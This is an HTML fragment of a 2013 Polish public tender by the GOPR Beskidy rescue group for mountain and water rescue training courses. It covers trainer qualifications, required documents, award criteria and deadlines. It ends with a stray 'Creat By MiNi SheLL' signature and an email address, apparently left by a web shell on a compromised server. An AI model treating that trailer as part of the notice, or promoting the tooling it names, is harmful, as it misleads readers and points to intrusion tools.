1.3.	Zamawiający uzna warunek określony w pkt 1.2 za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), zrealizował szkolenia/kursy zbieżne z tematyką szkoleń będących przedmiotem zamówienia, określonych w p. III. 4 SIWZ łącznie w liczbie 300 godzin, każde szkolenie/kurs dla minimum 15 uczestników/czek,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.4.spełniają warunek określony w art. 22 ust. 1 pkt 3 ustawy, dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
1.5.Zamawiający uzna warunek określony w pkt  1.4. za spełniony, jeżeli wykonawca wykaże, że w przypadku wyboru jego oferty dysponować będzie kadrą posiadającą kwalifikacje zawodowe i doświadczenie niezbędne do wykonania zamówienia tj.
1.5.1.wskaże co najmniej jednego instruktora prowadzącego, do każdego tematu szkoleniowego, 
posiadającego następujące kwalifikacje: 
1.5.1.1.wiedzę praktyczną z tematyki ratownictwa górskiego popartą minimum sześcioletnim doświadczeniem praktycznym w pracy lub działalności ochotniczej w tym zakresie,
1.5.1.2.przeprowadzone min. 100 godzin szkoleniowych w zakresie wymaganych uprawnień instruktorskich w ciągu ostatnich 3 lat,
1.5.1.3.aktualne uprawnienia instruktorskie tj.: instruktor ratownictwa górskiego dla szkoleń: organizacja działań poszukiwawczo-ratowniczych, ratownictwo zimowe, techniki linowe w ratownictwie, ratownictwo lawinowe, ratownictwo z powietrza, obóz kondycyjny letni, instruktor narciarstwa zjazdowego, instruktor narciarstwa wysokogórskiego lub instruktor ratownictwa górskiego i  pomocnik instruktora narciarstwa zjazdowego dla szkolenia obóz kondycyjny zimowy, instruktor ratownictwa wodnego lub instruktor ratownictwa górskiego i co najmniej ratownik wodny lub instruktor sportów wodnych dla szkolenia ratownictwo na wodach szybkopłynących i powodziowych
1.5.1.4.wszelkie niezbędne uprawnienia do wykonywania określonych czynności, jeśli przepisy nakładają taki obowiązek. 
1.5.2.	wskaże co najmniej jednego trenera, jako instruktora-asystenta, do każdego tematu szkoleniowego (a w przypadku szkolenia (techniki linowe) oraz obozu letniego co najmniej dwóch instruktorów-asystentów), posiadającego następujące kwalifikacje: 
1.5.2.1.wiedzę praktyczną z tematyki ratownictwa górskiego popartą minimum czteroletnim doświadczeniem praktycznym w pracy lub działalności ochotniczej w tym zakresie,
1.5.2.2.przeprowadzone min. 50 godzin szkoleniowych w zakresie wymaganych uprawnień instruktorskich w ciągu ostatnich 3 lat,
1.5.2.3.aktualne uprawnienia instruktorskie tj.: instruktor ratownictwa górskiego dla szkoleń: organizacja działań poszukiwawczo-ratowniczych, ratownictwo zimowe, techniki linowe w ratownictwie, ratownictwo lawinowe, ratownictwo z powietrza, obóz kondycyjny letni; instruktor narciarstwa zjazdowego, instruktor narciarstwa wysokogórskiego lub instruktor ratownictwa górskiego i pomocnik instruktora narciarstwa zjazdowego dla szkolenia obóz kondycyjny zimowy; instruktor ratownictwa wodnego lub instruktor ratownictwa górskiego i co najmniej ratownik wodny lub instruktor sportów wodnych dla szkolenia ratownictwo na wodach szybkopłynących i powodziowych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.4.spełniają warunek określony w art. 22 ust. 1 pkt 3 ustawy, dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
1.5.Zamawiający uzna warunek określony w pkt  1.4. za spełniony, jeżeli wykonawca wykaże, że w przypadku wyboru jego oferty dysponować będzie kadrą posiadającą kwalifikacje zawodowe i doświadczenie niezbędne do wykonania zamówienia tj.: 
1.5.1.wskaże co najmniej jednego instruktora prowadzącego, do każdego tematu szkoleniowego, 
posiadającego następujące kwalifikacje: 
1.5.1.1.wiedzę praktyczną z tematyki ratownictwa górskiego popartą minimum sześcioletnim doświadczeniem praktycznym w pracy lub działalności ochotniczej w tym zakresie,
1.5.1.2.przeprowadzone min. 100 godzin szkoleniowych w zakresie wymaganych uprawnień instruktorskich w ciągu ostatnich 3 lat,
1.5.1.3.aktualne uprawnienia instruktorskie tj.: instruktor ratownictwa górskiego dla szkoleń: organizacja działań poszukiwawczo-ratowniczych, ratownictwo zimowe, techniki linowe w ratownictwie, ratownictwo lawinowe, ratownictwo z powietrza, obóz kondycyjny letni; instruktor narciarstwa zjazdowego, instruktor narciarstwa wysokogórskiego lub instruktor ratownictwa górskiego i  pomocnik instruktora narciarstwa zjazdowego dla szkolenia obóz kondycyjny zimowy; instruktor ratownictwa wodnego lub instruktor ratownictwa górskiego i co najmniej ratownik wodny lub instruktor sportów wodnych dla szkolenia ratownictwo na wodach szybkopłynących i powodziowych;
1.5.1.4.wszelkie niezbędne uprawnienia do wykonywania określonych czynności, jeśli przepisy nakładają taki obowiązek. 
1.5.2.	wskaże co najmniej jednego trenera, jako instruktora-asystenta, do każdego tematu szkoleniowego (a w przypadku szkolenia (techniki linowe) oraz obozu letniego co najmniej dwóch instruktorów-asystentów), posiadającego następujące kwalifikacje: 
1.5.2.1.wiedzę praktyczną z tematyki ratownictwa górskiego popartą minimum czteroletnim doświadczeniem praktycznym w pracy lub działalności ochotniczej w tym zakresie,
1.5.2.2.przeprowadzone min. 50 godzin szkoleniowych w zakresie wymaganych uprawnień instruktorskich w ciągu ostatnich 3 lat,
1.5.2.3.aktualne uprawnienia instruktorskie tj.: instruktor ratownictwa górskiego dla szkoleń: organizacja działań poszukiwawczo-ratowniczych, ratownictwo zimowe, techniki linowe w ratownictwie, ratownictwo lawinowe, ratownictwo z powietrza, obóz kondycyjny letni; instruktor narciarstwa zjazdowego, instruktor narciarstwa wysokogórskiego lub instruktor ratownictwa górskiego i  pomocnik instruktora narciarstwa zjazdowego dla szkolenia obóz kondycyjny zimowy; instruktor ratownictwa wodnego lub instruktor ratownictwa górskiego i co najmniej ratownik wodny lub instruktor sportów wodnych dla szkolenia ratownictwo na wodach szybkopłynących i powodziowych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.5.2.4.	wszelkie niezbędne uprawnienia do wykonywania określonych czynności, jeśli przepisy nakładają taki obowiązek. 
1.6.	spełniają warunek określony w art. 22 ust. 1 pkt 4 ustawy, dotyczący sytuacji ekonomicznej i finansowej; 
1.7.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy. 
2.	Zamawiający dokona oceny spełniania przez wykonawcę warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia, na podstawie oświadczeń i dokumentów złożonych przez wykonawcę wraz z ofertą, wymienionych i opisanych w Rozdziale VI SIWZ. 
3.	Zamawiający wykluczy z postępowania na podstawie art. 24 ust. 2 pkt 4 ustawy wykonawców, którzy nie wykażą spełniania warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.3.wraz z wykazem usług należy przedstawić dokumenty potwierdzające należyte wykonanie usług dla co najmniej 2 podmiotów wymienionych w wykazie, a wystawionych w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeśli okres prowadzenia działalności jest krótszy - w tym okresie), 
1.4.wykaz trenerów którzy będą uczestniczyć w realizacji zamówienia wraz z informacjami odnośnie ich kwalifikacji zawodowych i doświadczenia, a także informacją na temat przeprowadzonych szkoleń/kursów z zakresu zbieżnego z tematyką danego szkolenia; wykaz należy sporządzić według wzoru zawartego w Załączniku nr 4 do SIWZ, 
1.5.oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - zgodnie z wzorem zawartym w Załączniku nr 4 do SIWZ.
2.3.oświadczenie o braku przynależności do grupy kapitałowej, o której mowa w art. 24 ust 2 pkt 5 ustawy (zawarte w załączniku nr 2B do SWIZ ),
2.4.listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust 2 pkt 5 ustawy (listę składa jedynie ten wykonawca, który należy do grupy kapitałowej i nie złożył oświadczenia, o którym mowa w pkt 2.3.).3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt VI.2.2. - składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wydany nie wcześniej niż 6 miesięcy przed terminem składania ofert. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt VI.2.2., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, sporządzonym nie wcześniej niż w terminie wskazanym w zdaniu poprzedzającym
4.Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniami na język polski. 
5.Oświadczenie i wykazy, o których mowa w pkt VI.1. oraz VI.2.1., VI.2.3, VI.2.4. należy złożyć w formie oryginału, zaś dokumenty, o których mowa w pkt VI.2.2.w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
6.Ilekroć w SIWZ, a także w załącznikach do SIWZ, wskazano wymóg podpisywania dokumentów lub oświadczeń lub też potwierdzania dokumentów za zgodność z oryginałem, należy przez to rozumieć, że oświadczenia i dokumenty te powinny być opatrzone podpisem (podpisami) wykonawcy, osoby (osób) uprawnionej (uprawnionych) do reprezentowania wykonawcy, zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze lub osoby (osób) upoważnionej (upoważnionych) do reprezentowania wykonawcy na podstawie pełnomocnictwa. 
7.Podpisy na oświadczeniach i dokumentach powinny być złożone z pieczątką z imieniem i nazwiskiem osoby podpisującej. 
8.W przypadku potwierdzania dokumentów za zgodność z oryginałem, na dokumentach tych muszą się znaleźć podpisy, według zasad, o których mowa w pkt 5 i 6 oraz klauzula (za zgodność z oryginałem). W przypadku dokumentów wielostronicowych, należy poświadczyć za zgodność z oryginałem każdą zapisaną stronę dokumentu, ewentualnie poświadczenie może znaleźć się na jednej ze stron wraz z informacją o liczbie poświadczanych stron. 
9.Pełnomocnictwo, o którym mowa w pkt 6 należy dołączyć do oferty w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza lub mocodawcę. 
10.W przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymienione w pkt. VI.2.1. i VI.2.2. każdy z wykonawców składa oddzielnie, pozostałe dokumenty i oświadczenia wskazane w pkt. VI mogą zostać złożone przez jednego z wykonawców albo wspólnie. Oświadczenie na wzorze zawartym w Załączniku nr 2 A do SIWZ składane jest wspólnie przez wykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Konspekt szkolenia zawierający opis metod i narzędzi pracy - 50</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.beskidy.gopr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Grupa  Regionalna  GOPR  Grupa  Beskidzka
43-370  Szczyrk
ul. Dębowa 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 10:00, miejsce: Grupa  Regionalna  GOPR  Grupa  Beskidzka
43-370  Szczyrk
ul. Dębowa 2
pok.32.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 11.Projekt (Na każde wezwanie II) jest współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VIII Regionalne kadry gospodarki, Działanie 8.1 (Rozwój pracowników i przedsiębiorstw w regionie), Poddziałanie 8.1.1 (Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com